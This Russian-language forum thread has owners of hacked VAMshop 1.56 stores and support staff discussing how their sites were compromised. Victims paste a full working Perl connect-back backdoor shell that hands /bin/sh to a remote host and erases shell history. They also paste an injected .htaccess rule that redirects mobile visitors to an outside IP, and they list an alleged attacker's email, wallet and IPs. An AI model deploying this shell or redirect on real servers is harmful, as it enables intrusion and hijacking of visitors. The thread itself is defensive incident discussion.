возможные уязвимости в vamshop 1.56

[geval 3]

в общем пролезли на сервер вчера какие-то гады, нашли дырку вообще в другом скрипте..

но возможно и в вамшопе есть, потому что именно для юзеров у которых vamshop в папку images

были записаны два шелла одинаковых... планомерно, два разных магазина с разными юзерами, одинаковые шеллы

Начало шелла угарно начинается:

#IRAN HACKERS SABOTAGE Connect Back Shell

#code by:LorD

#We Are :LorD-C0d3r-NT

#Email:LorD@ihsteam.com

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

Файл прилагается..

Вопрос, как они могли? если .htaccess стоит?

закрывайте дыры!!!

[geval 3]

вот собственно и сам шелл- во вложении.

я так понимаю это просто удаленный доступ..

а блин..шелл не загружается..ну ладно- вот текст..

#!/usr/bin/perl

use IO::Socket;

#IRAN HACKERS SABOTAGE Connect Back Shell

#code by:LorD

#We Are :LorD-C0d3r-NT

#Email:LorD@ihsteam.com

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#[*] Resolving HostName

#[*] Connecting... 127.0.0.1

#[*] Spawning Shell

#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121

#listening on [any] 2121 ...

#connect to [127.0.0.1] from localhost [127.0.0.1] 32769

#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#--==Systeminfo==--

#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux

#

#--==Userinfo==--

#uid=1001(lord) gid=100(users) groups=100(users)

#

#--==Directory==--

#/root

#

#--==Shell==--

#

$system = '/bin/sh';

$ARGC=@ARGV;

print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";

if ($ARGC!=2) {

print "Usage: $0 [Host] [Port] \n\n";

die "Ex: $0 127.0.0.1 2121 \n";

}

use Socket;

use FileHandle;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";

print "[*] Resolving HostName\n";

print "[*] Connecting... $ARGV[0] \n";

print "[*] Spawning Shell \n";

print "[*] Connected to remote host \n";

SOCKET->autoflush();

open(STDIN, ">&SOCKET");

open(STDOUT,">&SOCKET");

open(STDERR,">&SOCKET");

print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";

system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");

system($system);

#EOF

[geval 3]

а вот еще- в ту же папку images закачали..

не поленитесь-

http://files.mail.ru/T2BWPI

скачайте и офигейте..как ловкие сеошники используют файлы- для конкурсов ( там хтмл-вирусов нет..)

в общем проверяйтесь...

и дайте заплатку!!!

[geval 3]

в эту же папку images была закачана веселая папка enlightenment и ней туча просто шеллов и скриптов..на СИ и на sh

[geval 3]

в общем просмотрел- на части моих сайтов в папку images чего только не было напихано...

.htaccess не спас, который в последней версии...

даже хтмл страницы ухитрились какие-то балбесы вебмастера напихать, с рекламой или конкурсов или услуг.. ( ссылка выше)

поэтому встает вопрос- как РАДИКАЛЬНО защитить папку images ?

не уверен, что права 744 прямо таки помогут

[support 447]

Вы, по-моему, не понимаете смысл .htaccess в /images папке.

.htaccess спасает от выполнения php из этой папки, тут нет проблем, даже если закачали shell, они его выполнить не смогут.

Но это если в /images загрузили.

Нужно смотреть КАК загрузили в images.

А грузят файлы через какие-либо дырки в скриптах, обычно.

Доступ есть к access и error логу?!

Примерная дата когда загрузили shell известна?

Ну и 1.56 версия довольно старая, если я не ошибаюсь, то с тех временём и дырки закрывались.

[geval 3]

примерная дата- август, либо начало сентября.

по разному.

доступ то есть, но по этим датам смотреть конечно запарочно..

я к тому что .htacess не полный, там список расширений далеко не весь..

загружено было также и в более новые версии, 1.63, но это уже один два случая..

я к тому что надо расширять возможности .htaccess

[geval 3]

<FilesMatch ".(php|php3|phtml|inc|c|htm|html|pl|cgi)$">

Order Allow,Deny

Deny from all

</FilesMatch>

а еще были расширения php4 php5 и sh

[support 447]

Нужно по логам смотреть, как попали эти файлы.

Только зная хотя бы дату точную, можно что-то найти.

[Иван Градов 0]

ищите больше :)

1. смотрите папку images - там будут минимум 3 файла xx.pl xx и файл с буквенно-цифровым названием

2. смотрите папку jquery - там будут папки левые и файлы

3. смотрите файл affiliate_affiliate_process или какой-нибудь схожий по названию - тырят пароли\логины партнеров и записывают им свои кошельки вэбмани

4. забыл что именно, но что-то выковыривал еще из папки includes

взлом происходит через файл upload.php из редактора tiny (это один из вариантов, но не единственный), еще взламывают через уязвимости в swfobject.js

можете посмотреть логи ошибок - наверняка их роботы долбятся к вам каждый час на заливку новых статей и установку ссылок...

да, лучший способ найти всё - скачать к себе и пройтись касперским - он покажет шеллы, а потом по дате модификации файла пройтись по содержимому сервера...

[support 447]

В tinymce я текущих версиях ведь авторизация стоит, по идее, upload просто так нельзя использовать.

А вот про swfobject.js не слышал.

Не подкинете ссылку, где можно почитать на эту тему?

[Иван Градов 0]

Да, кстати, среди левых папок будет файл links.db

Опубликуйте здесь его содержание - там будет 3-4 строчки кода - по нему можно установить мыло взломщика, его айпишники и его кошелек вебмани

на моих магазинах работал

repkovich@yandex.ru

R328258788480

178.74.67.110

77.221.204.142

2.60.90.151

2.60.255.85

а его роботы долбятся с:

[Wed Oct 5 08:09:59 2011] [error] [client 208.43.215.60] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 08:27:39 2011] [error] [client 173.192.21.34] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 08:27:40 2011] [error] [client 74.86.56.241] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 08:28:01 2011] [error] [client 173.192.21.34] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 08:28:02 2011] [error] [client 75.126.160.126] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 08:28:59 2011] [error] [client 173.192.21.34] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 08:29:02 2011] [error] [client 74.86.80.122] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 08:31:57 2011] [error] [client 173.192.21.34] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 08:31:59 2011] [error] [client 75.126.224.153] File does not exist: /usr/home/xxx/domlinz.ru/www/jscript/jquery/scripts/upload.php

[Wed Oct 5 09:14:41 2011] [error] [client 62.117.87.29] File does not exist: /usr/home/xxx/domlinz.ru/www/admin/js/swfobject.js

[Wed Oct 5 10:08:01 2011] [error]

[Иван Градов 0]

один из логов попытки взлома:

2011-06-29 18:31:29 (MSD) 8 Notice Undefined index: type File: upload.php Line: 46

2011-06-29 18:31:29 (MSD) 8 Notice Undefined index: type File: upload.php Line: 58

2011-06-29 18:31:29 (MSD) 8 Notice Undefined index: File: upload.php Line: 58

2011-06-29 18:31:29 (MSD) 8 Notice Undefined variable: filestr File: upload.php Line: 59

2011-06-29 18:31:29 (MSD) 8 Notice Undefined index: type File: upload.php Line: 59

2011-06-29 18:31:29 (MSD) 8 Notice Undefined index: File: upload.php Line: 59

2011-06-29 18:31:29 (MSD) 8 Notice Undefined index: type File: upload.php Line: 120

2011-06-29 18:31:29 (MSD) 8 Notice Undefined index: File: upload.php Line: 120

2011-06-29 18:34:10 (MSD) 2 Warning imagecreatefromgif() [<a href='function.imagecreatefromgif'>function.imagecreatefromgif</a>]: '/usr/home/xxx/domlinz.ru/www/images/a10955d.php.27111' is not a valid GIF file File: fns_tinybrowser.php Line: 157

2011-06-29 18:34:10 (MSD) 2 Warning imagesx(): supplied argument is not a valid Image resource File: fns_tinybrowser.php Line: 49

2011-06-29 18:34:10 (MSD) 2 Warning imagesy(): supplied argument is not a valid Image resource File: fns_tinybrowser.php Line: 50

2011-06-29 18:34:10 (MSD) 2 Warning imagegif(): supplied argument is not a valid Image resource File: fns_tinybrowser.php Line: 137

2011-06-29 18:34:10 (MSD) 2 Warning imagedestroy(): supplied argument is not a valid Image resource File: upload_process.php Line: 74

2011-09-17 21:48:58 (MSD) 2 Warning imagegif() [<a href='function.imagegif'>function.imagegif</a>]: Unable to open '/usr/home/xxx/domlinz.ru/www/images/_thumbs/_iw1.gif' for writing: No such file or directory File: fns_tinybrowser.php Line: 137

[sheldon 1]

а что мешает обновиться до последнего патча? я тоже попал как раз на 156 патче. и потом долго и муторно,мне один очень хороший человек,помогал два раза вылечить сайт от вирусов, закруть дырки,и потом я обновился до последнего патча и, тьфу,тьфу,тьфу. А?

[Иван Градов 0]

а что мешает обновиться до последнего патча? я тоже попал как раз на 156 патче. и потом долго и муторно,мне один очень хороший человек,помогал два раза вылечить сайт от вирусов, закруть дырки,и потом я обновился до последнего патча и, тьфу,тьфу,тьфу. А?

ну дело в том, что сам VAMshop, будучи отличным набором скриптов, с точки зрения юзабилити и дизайна требует серьезнейшей допилки напильником... а потому каждое обновление является жуткой головной болью...

[support 447]

Так а что это у Вас вообще за update.php файл, такого ведь нет по умолчанию.

Если версия старая, то его просто через дырку могли загрузить в магазин (в обновлениях в том числе и дырки закрываются обнаруживаемые), а там уже всё что угодно можно делать.

[turkinaw 0]

второй день борюсь, но снова и снова возникает вhtaccess следующая фигня.

папку images освободил,

скачал сайт на комп - проверили антивирусом - больше ничего не находит - а добавка все равно возникает

RewriteEngine on

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]

RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]

RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]

RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]

RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]

RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]

RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]

RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]

RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]

RewriteCond %{HTTP_USER_AGENT} java [NC,OR]

RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]

RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} macintosh [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Macintosh [NC,OR]

RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]

RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]

RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR]

RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]

RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]

RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]

RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]

RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]

RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]

RewriteCond %{HTTP_USER_AGENT} play [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]

RewriteCond %{HTTP_USER_AGENT} port [NC,OR]

RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]

RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]

RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} send [NC,OR]

RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]

RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]

RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Symbian [NC]

RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]

RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]

RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]

RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]

RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]

RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]

RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]

RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]

RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR]

RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]

RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} !america [NC]

RewriteCond %{HTTP_USER_AGENT} !avant [NC]

RewriteCond %{HTTP_USER_AGENT} !bot [NC]

RewriteCond %{HTTP_USER_AGENT} !bsd [NC]

RewriteCond %{HTTP_USER_AGENT} !download [NC]

RewriteCond %{HTTP_USER_AGENT} !fdm [NC]

RewriteCond %{HTTP_USER_AGENT} !google [NC]

RewriteCond %{HTTP_USER_AGENT} !iPad [NC]

RewriteCond %{HTTP_USER_AGENT} !ipad [NC]

RewriteCond %{HTTP_USER_AGENT} !iphone [NC]

RewriteCond %{HTTP_USER_AGENT} !iPhone [NC]

RewriteCond %{HTTP_USER_AGENT} !libwww [NC]

RewriteCond %{HTTP_USER_AGENT} !macos [NC]

RewriteCond %{HTTP_USER_AGENT} !maui [NC]

RewriteCond %{HTTP_USER_AGENT} !msn [NC]

RewriteCond %{HTTP_USER_AGENT} !playstation [NC]

RewriteCond %{HTTP_USER_AGENT} !unix [NC]

RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]

RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]

RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteCond %{HTTP_USER_AGENT} !x11 [NC]

RewriteCond %{HTTP_USER_AGENT} !yandex [NC]

RewriteRule ^(.*)$ http://62.109.6.24/go.php?id=1 [L,R=302]

[Andrew_Yer 0]

Прежде всего, установите на файл htaccess права только на чтение.

Уже потом ищите лазейку для злоумышленников.

[support 447]

Наверное где-то у Вас в файлах Shell сидит и через него ломают.

Но само собой нужно обновлять магазин, если у Вас старая версия.

[Александр Муравьев 0]

подскажите пожалуйста. в .htaccess вот эти данные нужны? обнаружил у себя :-))

RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]

RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]

RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]

RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]

RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]

RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]

RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]

RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]

RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]

RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]

RewriteCond %{HTTP_USER_AGENT} java [NC,OR]

RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]

RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]

RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]

RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]

RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]

RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]

RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]

RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]

RewriteCond %{HTTP_USER_AGENT} play [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} port [NC,OR]

RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]

RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]

RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} send [NC,OR]

RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]

RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]

RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]

RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]

RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]

RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]

RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]

RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]

RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]

RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]

RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]

RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC]

RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]

RewriteCond %{HTTP_USER_AGENT} !bsd [NC]

RewriteCond %{HTTP_USER_AGENT} !x11 [NC]

RewriteCond %{HTTP_USER_AGENT} !unix [NC]

RewriteCond %{HTTP_USER_AGENT} !macos [NC]

RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]

RewriteCond %{HTTP_USER_AGENT} !playstation [NC]

RewriteCond %{HTTP_USER_AGENT} !google [NC]

RewriteCond %{HTTP_USER_AGENT} !yandex [NC]

RewriteCond %{HTTP_USER_AGENT} !bot [NC]

RewriteCond %{HTTP_USER_AGENT} !libwww [NC]

RewriteCond %{HTTP_USER_AGENT} !msn [NC]

RewriteCond %{HTTP_USER_AGENT} !america [NC]

RewriteCond %{HTTP_USER_AGENT} !avant [NC]

RewriteCond %{HTTP_USER_AGENT} !download [NC]

RewriteCond %{HTTP_USER_AGENT} !fdm [NC]

RewriteCond %{HTTP_USER_AGENT} !maui [NC]

RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]

RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

[support 447]

Нет, не нужны.

[Александр Муравьев 0]

потер это лишнее

проблема вот еще в чем

при архивации всего домашнего каталога. файл в корне сайта .htaccess не копируется (почему то)

файлы .htaccess в папках копируются

посему оказалось что откуда и когда эти лишние данные появились. узнать не представляется возможным

файлы .htaccess без расширения. собственно как в вамшопе те что в папках

[support 447]

Нужно паковать папку, тогда файл сохранится, т.е. если .htaccess в папке, то сохраняется.

Либо использовать нормальный архиватов, у которого нет таких проблем.